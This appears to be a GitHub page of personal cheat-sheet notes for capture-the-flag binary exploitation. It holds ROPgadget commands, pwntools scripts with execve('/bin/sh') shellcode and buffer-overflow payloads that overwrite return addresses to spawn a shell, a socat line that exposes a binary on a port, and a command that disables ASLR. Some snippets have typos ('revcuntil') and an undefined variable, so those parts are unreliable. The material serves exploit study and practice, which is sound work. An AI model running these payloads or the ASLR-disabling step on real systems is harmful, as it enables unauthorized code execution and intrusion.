-
Notifications
You must be signed in to change notification settings - Fork 2
/
pwntools
55 lines (44 loc) · 1.31 KB
/
pwntools
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
ROPgadget:
ROPgadget --binary ret2syscall --only 'pop|ret' | grep "eax"
ROPgadget --binary ret2syscall --string '/bin/sh'
pwntools:
from pwn import *
sh = process('./ret2syscall')
shellcode = "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"
sh.sendline(payload)
sh.interactive()
sh.recvline()
sh.revcuntil('[')--->daadsds[
sh.revcuntil(']',drop=True)--->0x11223344
eg1:
from pwn import *
sh = process('./pwn6')
esp=0xffffd1da
shellcode = "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"
payload = shellcode+'\x90'*12+p32(esp-0x24)
sh.sendline(payload)
sh.interactive()
eb2
:#coding:utf-8
from pwn import *
context.log_level = 'debug'
p = process('./pwn1')
#p = remote('172.16.5.7',8888)
print(p.recvuntil("hey, what's your name?"))
#send jmpesp to id
jmpesp = asm('jmp rsp',arch='amd64')
p.sendline(jmpesp)
print(p.recvuntil('>'))
p.sendline("1")
address_jmpesp = 0x00000000006020A0
shellcode = asm(shellcraft.amd64.linux.sh(), arch = 'amd64')
payload = 'A'*40+p64(address_jmpesp)+shellcode
p.sendline(payload)
p.interactive()
将程序作为服务绑定在某个端口上
socat TCP4-LISTEN:10001,fork EXEC:./level1
nc 127.0.0.1 10001
开core dump
ulimit -c unlimited
关闭ASLR
echo 0 > /proc/sys/kernel/randomize_va_space